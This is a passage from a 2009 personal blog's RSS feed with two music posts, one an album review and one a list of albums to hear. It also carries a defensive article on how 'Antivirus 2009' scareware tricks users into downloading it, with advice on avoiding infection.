<p>Beautiful entry to track three, few tweaks to the mix would make this perfect, reverb on the pizzicato violin doesn&#8217;t sit right. Song is longer than it needs to be, with the main riff repeated. The violin again needs a bigger dose of originality. This song again does not have the depth of the first, but shows more variety, and certainly a lot of promise for their next&nbsp;album.</p>
<div id="0902-CryptNev-player8">Media Player shows Here. Enable Javascript + Flash.</div>
<p><script type="text/javascript"><!--
var so = new SWFObject('/wp-content/uploads/2009/01/player.swf','mpl','400','20','9');
so.addParam('flashvars','&#038;file=/wp-content/uploads/2009/02/nevetherym3.mp3');
so.write('0902-CryptNev-player8');
// --></script></p>
<p>This album, with all its flaws, is a super original, promising album, I will certainly keep Nevetherym on my radar, and I wait in anticipation for their next release. To hear the full recordings of these songs, see Nevetherym on&nbsp;<a href="http://www.myspace.com/nevetherym">myspace</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.peacocktech.com/2009/02/01/cryptopsy-and-nevetherym/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Antivirus 2009 infection, and how to prevent it</title>
		<link>http://blog.peacocktech.com/2009/02/01/antivirus-2009-prevention/</link>
		<comments>http://blog.peacocktech.com/2009/02/01/antivirus-2009-prevention/#comments</comments>
		<pubDate>Sun, 01 Feb 2009 10:45:10 +0000</pubDate>
		<dc:creator>TrevorP</dc:creator>
				<category><![CDATA[Science & Technology]]></category>

		<guid isPermaLink="false">http://blog.peacocktech.com/?p=96</guid>
		<description><![CDATA[Overview:
This article describes an investigation into the cause of infection of AntiSpyware2009 and similar&#160;malware.
Goals:

Find where this malware&#160;lives
Find how this malware is&#160;installed

Method:
This research was performed on two VMWare Server 2 virtual machines, on an Internet connected computer, isolated by a firewall from any other computers on the&#160;site.
The two computers&#160;were:

Windows 2000, Service Pack 4, Internet explorer 6 [...]]]></description>
			<content:encoded><![CDATA[<h3>Overview:</h3>
<p>This article describes an investigation into the cause of infection of AntiSpyware2009 and similar&nbsp;malware.</p>
<h3>Goals:</h3>
<ul>
<li>Find where this malware&nbsp;lives</li>
<li>Find how this malware is&nbsp;installed</li>
</ul>
<h3>Method:</h3>
<p>This research was performed on two VMWare Server 2 virtual machines, on an Internet connected computer, isolated by a firewall from any other computers on the&nbsp;site.</p>
<p>The two computers&nbsp;were:</p>
<ul>
<li>Windows 2000, Service Pack 4, Internet explorer 6 and Firefox 3, All windows updates&nbsp;installed</li>
<li>Windows XP, Service Pack 3, no updates installed. Internet Explorer 6 and 7&nbsp;tested.</li>
</ul>
<p>Online research provided the researcher with several possible malicious websites. These sites were opened in the web browsers of the test&nbsp;machines.</p>
<h3>Results:</h3>
<p>The virus was discovered on several servers designed to handle redirects from other sites. These redirects come from sites that have been <a href="http://www.sophos.com/security/blog/2009/01/2608.html">tampered with</a>, usually by installing a .htaccess file that redirects users who visit an otherwise legitimate&nbsp;site.</p>
<p>Two different sites were found containing this virus. Each site presented several &#8220;warning&#8221; dialog boxes, telling the user they had a virus, and needed to run Antivirus 2009. Two examples of this dialogue are&nbsp;shown:</p>
<p><a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/popup1.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/popup1sm.png" alt="" /></a></p>
<p><a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/popup2.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/popup2.png" alt="" /></a></p>
<div style="border: 1px solid black; background-color:lightyellow;">
<ul>
<li>These dialog boxes show &#8220;Microsoft Internet Explorer&#8221; in the blue title bar. This is a limitation of the scam. A true virus scanner running on your system would be able to present an appropriate title bar, representing the correct name or function of the software. Seeing the name of your web-browser in the title bar is a give-away that the message is being generated by a web page inside the browser, and not by software on your&nbsp;system.</li>
</ul>
</div>
<p>The site then presents a mock virus scan, which quickly pretends to find several (hundred) infections. Clicking on any part of the page at any time causes a file download dialog to show, allowing the user to download and install the malware on their system.<br />
<a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/scan1.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/scan1sm.png" alt="" /></a></p>
<p><a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/scan2.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/scan2sm.png" alt="" /></a></p>
<div style="border: 1px solid black; background-color:lightyellow;">
<ul>
<li>Again, in both these examples, the falsified scan is bounded within the Internet Explorer window, and Internet Explores title-bar, menu and controls are visible at the top of the falsified scan. Furthermore, minimising the Internet Explorers window also hides the scan within it (This is not a foolproof&nbsp;test)</li>
<li>The scans claim to be scanning a C:\ drive and a D:\ drive, both hard drives. I know that my system only had one hard disk drive, so this report is clearly&nbsp;false.</li>
</ul>
</div>
<p>On completion of the falsified scan, the scam presents a warning that viruses have been found and should be removed. These warnings are simply images shown within the browser, allowing them to look very realistic.<br />
<a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/result1.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/result1.png" alt="" /></a></p>
<p><a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/result2.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/result2.png" alt="" /></a></p>
<div style="border: 1px solid black; background-color:lightyellow;">
<ul>
<li>Again, these screens are contained within the browser. Closing or moving the browser also moves these&nbsp;windows.</li>
<li>Being a static image, these do not react the way normal windows do. The mouse cursor is incorrect over much of the image, normal windows hover highlighting does not&nbsp;work.</li>
</ul>
</div>
<p>Clicking on any part of the browser frame causes a file download window to appear. Curiously it always seems to have the letters &#8220;AVg&#8221;, possibly to make the user think its the common Grisoft AVG virus scanner. Running this file will install the Antivirus 2009 malware package on the computer.<br />
<a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/downladie7.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/downladie7.png" alt="" /></a></p>
<p><a href="http://www.cbcomputers.com.au/site_media/view_image/articles/Antivirus2009/downloadie6.png"><br />
<img src="http://www.cbcomputers.com.au/site_media/articles/Antivirus2009/downloadie6.png" alt="" /></a></p>
<div style="border: 1px solid black; background-color:lightyellow;">
<ul>
<li>An important principal in computer security is not to accept files from someone you don&#8217;t know. Though this may appear to be a legitimate virus scanner, nowhere is the following information available:
<ul>
<li>The name of the software&nbsp;vendor</li>
<li>The location of the software&nbsp;vendor</li>
<li>The vendors website or other contact&nbsp;details</li>
<li>Any other information about the software, the license (describing who is allowed to use it, and for what purposes), and if the software is a trial or fully&nbsp;functioning.</li>
</ul>
</li>
</ul>
</div>
<p>This research did not proceed to install the malware and observe its behaviours, the goals were only to discover how infection&nbsp;occurred.</p>
<p>The files however were analysed, and were found to be viruses, both similar variants. Unfortunately only a few virus scanners actually detected this. The reason is unknown. Perhaps the virus is some form of self-modifying virus, which some scanners have difficulty&nbsp;detecting.</p>
<p>At the time of analysis (24th Jan), only three virus scanners were known to detect any virus in these files. Now a week later, 15-25 virus scanners (40-60%) now see it. Unfortunately, a newly downloaded file (recently updated by the virus writer) is only detected by 5 scanners. It seems the authors are constantly publishing new versions to hinder detection by virus scanners. (<a href="http://www.virustotal.com/analisis/7a0cdd4f1ffda9067dee8f8b2907f1b5">1</a> <a href="http://www.virustotal.com/analisis/e0b4dbc15d6df99396a1ed9c5607fb90">2</a>&nbsp;<a href="http://www.virustotal.com/analisis/91c67c7e22f5395234b11be7286a5013">3</a>)</p>
<h3>Conclusion:</h3>
<p>It was suspected before investigation that infection was due to a browser exploit, allowing the virus to install itself without user knowledge or consent. This was not found to be the case, rather, the user must knowingly install the virus, presumably after being convinced by the false virus report that it is a desirable course of action. Thus infection from these sites is preventable with user&nbsp;training.</p>
<p>Recommendations to users to avoid this style of attack are as&nbsp;follows.</p>
<div style="border: 3px solid black; background-color:lightblue;">
<ul>
<li>Know what virus scanners and security software are installed on your computer. If you see anything unfamiliar when using the Internet, be suspicious.
<ul>
<li>Know what this software is called, and what it looks&nbsp;like.</li>
<li>Other common security software you may not be aware of is Windows Defender and Microsoft Malicious Software Removal&nbsp;Tool.</li>
</ul>
</li>
<li>Before downloading any file from the Internet or email;
<ul>
<li>Know that running a file potentially allows it full access to your system, to modify it in any way, and use whatever techniques it has available to hide any virus&nbsp;activity.</li>
<li>Know and trust the author of the file. Ensure you are receiving the file directly from the author, so that you are sure the file has not been tampered&nbsp;with.</li>
</ul>
</li>
<li>Always browse the Internet with an up-to-date browser. In this testing, Firefox 3 prevented me from visiting these sites, warning that they were known to contain malwarre.
<ul>
<li>Avoid browsing with older or unsupported operating&nbsp;systems.</li>
<li>Ensure all your system software is kept up to date, Turn on Microsoft Update or Windows Update in&nbsp;Windows.</li>
</ul>
</li>
</ul>
</div>
]]></content:encoded>
			<wfw:commentRss>http://blog.peacocktech.com/2009/02/01/antivirus-2009-prevention/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Music</title>
		<link>http://blog.peacocktech.com/2009/01/31/new-music/</link>
		<comments>http://blog.peacocktech.com/2009/01/31/new-music/#comments</comments>
		<pubDate>Sat, 31 Jan 2009 02:04:34 +0000</pubDate>
		<dc:creator>TrevorP</dc:creator>
				<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://blog.peacocktech.com/?p=72</guid>
		<description><![CDATA[As those who follow me on twitter may know, I&#8217;m making an effort this year to listen to more new music (new to me, not necessarily new releases). I have found my enjoyment from playing and listening to music has dropped since I left uni, where having access to 30+ other peoples CD collection provided [...]]]></description>
			<content:encoded><![CDATA[<p>As those who follow me on <a href="http://twitter.com/trevorp">twitter</a> may know, I&#8217;m making an effort this year to listen to more new music (new to me, not necessarily new releases). I have found my enjoyment from playing and listening to music has dropped since I left uni, where having access to 30+ other peoples CD collection provided an almost limitless supply of new material, and I&#8217;d find myself every month or two obsessively listening to an album I had found. Without this flow of new music I have got bored listening to what I have in my collection, large as it&nbsp;is.</p>
<p>So, this year I will endeavour to listen to at least one new album every fortnight. That is, as soon as I have some new music to&nbsp;listen.</p>
<p>Living in a small country town, its hard to find new music. Radio gets tedious, favourites are few and far between. For discovery I rely mainly on podcasts, such as NPRs <a href="http://www.npr.org/allsongs">All Songs Considdered</a>, <a href="http://www.noidlefrets.com/">No Idle Frets</a>, <a href="http://coverville.com/">Coverville</a>, and&nbsp;<a href="http://www.brasscast.com/">Brasscast</a>.</p>
<p>With the nearest music shop (that sells anything outside top 20 pop) 50km away, music is hard to get hold of. Online stores have been little help over the years. Being a Linux user without an iPod, DRM-free mp3s are really the only option I will accept, and those options are still few. So for this year, I&#8217;m relying to having music mailed&nbsp;in.</p>
<p>I finally got an email informing me that <a href="http://www.jbhifionline.com.au/Music_.htm">JBHiFi</a> are shipping part of the order I made at the start of this month, So I&#8217;ll be able to start in earnest soon. Just need to decide which album to start&nbsp;with:</p>
<ul>
<li><span style="text-decoration: line-through;">Krallice&thinsp;&#8211;&thinsp;Krallice</span> (Still&nbsp;Waiting)</li>
<li>Bon Iver&thinsp;&#8211;&thinsp;For Emma, forever&nbsp;Ago</li>
<li>Death Cab For Cutie&thinsp;&#8211;&thinsp;Narrow&nbsp;Stairs</li>
<li>Mgmt&thinsp;&#8211;&thinsp;Oracular&nbsp;Spectacular</li>
<li>Sigur Ros&thinsp;&#8211;&thinsp;Med Sud I Eyrum Vid Spilum&nbsp;Endalaust</li>
<li><span style="text-decoration: line-through;">Son Lux&thinsp;&#8211;&thinsp;At War With Walls &amp; Mazes</span> (Still&nbsp;Waiting)</li>
<li>Fleet Foxes&thinsp;&#8211;&thinsp;Fleet&nbsp;Foxes</li>
<li>Sparks&thinsp;&#8211;&thinsp;Exotic Creatures Of The&nbsp;Deep</li>
<li>Saboteurs, the (The Raconteurs)&thinsp;&#8211;&thinsp;Consolers Of The&nbsp;Lonely</li>
<li>Elbow&thinsp;&#8211;&thinsp;Seldom Seen&nbsp;Kid</li>
<li><span style="text-decoration: line-through;">Jeff Hanson&thinsp;&#8211;&thinsp;Madam Owl</span> (Still&nbsp;Waiting)</li>
<li>James Galway&thinsp;&#8211;&thinsp;O&#8217;Reilly&nbsp;Street</li>
</ul>
<p>I am keeping a <a href="http://spreadsheets.google.com/ccc?key=poU1tq5Fi6PMfyM2zE2E6DA">spreadsheet of possible music to listen to, what I&#8217;ve ordered, and what i&#8217;ve listened to</a>. Any suggestions of music to add, or what to listen to next will be much&nbsp;appreciated.</p>
<p>To keep the brain ticking over I will attempt to write a short review on each album as I listen to them, thought I&#8217;m not making any&nbsp;promises.</p>
<p>As for this month&#8230; On my first trip to Wagga for the year I dropped by my favourite music shop and picked three albums off the shelf. I have been <a href="http://www.last.fm/user/TrevorPeacock">listening to</a> two of these, Cryptopsy&thinsp;&#8211;&thinsp;The Unspoken King, and Nevertherym&thinsp;&#8211;&thinsp;Rendezvous. I will review these&nbsp;soon.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.peacocktech.com/2009/01/31/new-music/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
